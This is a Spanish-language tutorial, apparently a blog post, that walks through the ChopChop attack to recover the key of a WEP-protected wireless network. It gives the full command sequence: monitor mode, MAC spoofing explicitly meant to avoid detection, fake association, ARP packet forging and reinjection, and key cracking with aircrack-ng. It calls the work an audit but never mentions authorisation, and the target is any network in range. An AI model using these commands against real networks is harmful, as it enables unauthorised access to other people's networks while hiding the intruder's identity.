Tutorial ataque ChopChop

Vamos a indicar de una forma un poco teórica cómo se realiza el ataque de auditoria wireless llamado ChopChop.

Partimos de que ya tenemos un sistema Linux en el cual tenemos lo necesario para esta tarea. Si no es así recomiendo que os descargueis Wifiway o BackTrack, los podéis encontrar en Internet perfectamente.

Trabajaremos sobre el terminal, comprobar que teneis permisos de superusuario o por lo contrario no os permitirá el sistema ejecutar las aplicaciones.

Empecemos, abrimos un terminal y comprobaremos cual es nuestra tarjeta wireless, para ello ejecutamos:

  • iwconfig

Y nos quedamos con el nombre de nuestra interfaz que seguramente sea algo como “wlan0”.

Ahora debemos ponerla en modo monitor para que podamos seguir trabajando (Nota: no todas las tarjetas permiten este modo), así que hacemos lo siguiente:

  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger -m 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0

Con esto hemos cambiado la MAC de nuestra tarjeta para evitar que nos detecten (que cojan nuestra autentica MAC, aunque recuerdo que esto es una auditoría) y hemos puesto nuestra tarjeta en modo monitor, si todo a salido bien.

A continuación tenemos que ver que red es la que queremos elegir como objetivo, para eso hacemos:

  • airodump-ng wlan0

Nos saldrá una lista de redes a nuestro alcance, mostrandonos datos como la MAC del router (bssid), el nombre(essid), el canal (ch)… Nos quedaremos con el canal y el bssid para centrarnos en una sola y guardar paquetes suyos:

  • airodump-ng -c CANAL -w NOMBRE_ARCHIVO_PAQUETES –bssid BSSID_OBJETIVO wlan0

Una vez que nos hemos centrado en esa red, tenemos que abrir otro terminal para intentar asociarnos.

  • aireplay-ng -1 0 -a BSSID_OBJETIVO -h MAC_FALSA wlan0

Si todo sale como es debido nos saldrá un mensaje diciendo:

  • Association successfull : – )

Una vez conseguido esto iniciamos el ataque en si:

  • aireplay-ng -5 -b BSSID_OBJETIVO -h MAC_FALSA wlan0

Esto buscará una paquete válido y nos dirá que si lo queremos usar para trabajar con él, le decimos que sí con un “yes” o con una “y”. Despues de todo eso si nos ha creado un archivo con extension xor (*.xor) vamos por buen camino !! 😀

Vamos a convertir este paquete en un ARP para poderlo reinyectar y así obtener paquetes IVS de una manera mucho más rápida.

  • packetforge-ng -0 -a BSSID_OBJETIVO -h MAC_FALSA -k 255.255.255.255 -l 255.255.255.255 -y ARCHIVO_XOR -w ARP
  • aireplay-ng -2 -r ARP wlan0

Ya está, ahora sólo queda esperar a tener suficientes paquetes. Si queremos cuando tengamos 20000 ya podemos empezar a buscar la clave pero es muy dificil obtenerla con tan pocas. Con 2 millones la obtendremos sin esperar nada, así que tener paciencia 😛

Para realizar la búsqueda de la clave solo teneis que poner:

  • aircrack-ng NOMBRE_ARCHIVO_PAQUETES-01.cap

Listo !!! Ya está, esta es la forma de obtener la clave de una red con seguridad WEP mediante el ataque ChopChop. Espero haberos ayudados y que os haya ido todo bien, si tenéis algún problema no dudeis en comentar.

Un saludo !!!